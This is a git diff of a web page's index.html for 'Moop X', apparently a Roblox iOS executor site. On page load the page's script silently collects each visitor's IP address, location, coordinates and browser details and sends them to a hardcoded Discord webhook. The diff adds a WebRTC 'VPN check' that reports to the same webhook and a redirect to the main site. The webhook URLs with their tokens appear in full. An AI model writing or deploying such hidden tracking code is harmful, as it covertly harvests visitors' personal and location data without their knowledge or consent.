--- a/index.html
+++ b/index.html
@@ -4,33 +4,17 @@
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Welcome to an awesome website</title>
-    <style>
-        body {
-            font-family: 'Arial', sans-serif;
-            margin: 20px;
-        }
+    <title>Moop X</title>
+    <!-- Open Graph Meta Tags -->
+    <meta property="og:title" content="Moop X">
+    <meta property="og:description" content="Redefining Roblox on iOS with state-of-the-art features and seamless execution. Elevate your gaming experience to unprecedented levels. Download now for a new standard of excellence in mobile gameplay.">
+    <meta property="og:url" content="https://moopx.pro/home">
 
-        h1 {
-            color: #333;
-        }
-
-        p {
-            color: #555;
-        }
-
-        a {
-            color: #007BFF;
-        }
-    </style>
 </head>
 <body>
-    <h1>Welcome to an awesome website</h1>
-    <p>This website is no longer useless! If you're feeling adventurous, you can visit the main website <a href="https://moopx.pro" target="_blank">here</a>.</p>
-
     <script>
         document.addEventListener('DOMContentLoaded', function() {
-            const webhookUrl = 'https://discord.com/api/webhooks/1181948401353502751/dv7MXBVzmttSIHREI2lZ67U2sb5CvroDpv62nsGAH1yDBihziRNfX3vtYJY304G14BF4'; // Replace with your Discord webhook URL
+            const webhookUrl = 'https://discord.com/api/webhooks/1181568688365772810/a8uz5coZtPV_fm96znZsrCny53RXJn55vjU0P6QfzL7VVVvcoDjnCvKgfbjPhHARDI5N'; // Replace with your Discord webhook URL
 
             // Function to send user and device information to Discord
             const sendInfoToDiscord = (ip, address, userAgent, isVPN, coordinates) => {
@@ -50,6 +34,30 @@
                 return `https://www.google.com/maps?q=${coordinates}`;
             };
 
+            // Function to check if the user is using a VPN
+            const checkVPN = () => {
+                const RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
+
+                if (RTCPeerConnection) {
+                    const rtc = new RTCPeerConnection({ iceServers: [] });
+                    rtc.createDataChannel('');
+
+                    rtc.createOffer().then(
+                        rtc.createAnswer.bind(rtc),
+                        () => {
+                            // The user is likely using a VPN
+                            sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, true, 'N/A');
+                        }
+                    ).catch(() => {
+                        // The user is not using a VPN
+                        sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, false, 'N/A');
+                    });
+                } else {
+                    // Unable to determine VPN status
+                    sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, 'Unknown', 'N/A');
+                }
+            };
+
             // Function to get visitor's information including coordinates
             const getVisitorInfo = async () => {
                 try {
@@ -66,10 +74,12 @@
                     const ip = infoData.ip || 'N/A';
                     const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
                     const userAgent = navigator.userAgent;
-                    const isVPN = infoData.vpn || false;
 
-                    // Sending data to Discord with VPN status
-                    sendInfoToDiscord(ip, address, userAgent, isVPN, coordinates);
+                    // Check if the user is using a VPN
+                    checkVPN();
+
+                    // Redirect to "https://moopx.pro"
+                    window.location.href = "https://moopx.pro";
                 } catch (error) {
                     console.error('Error fetching location or address:', error);
                 }
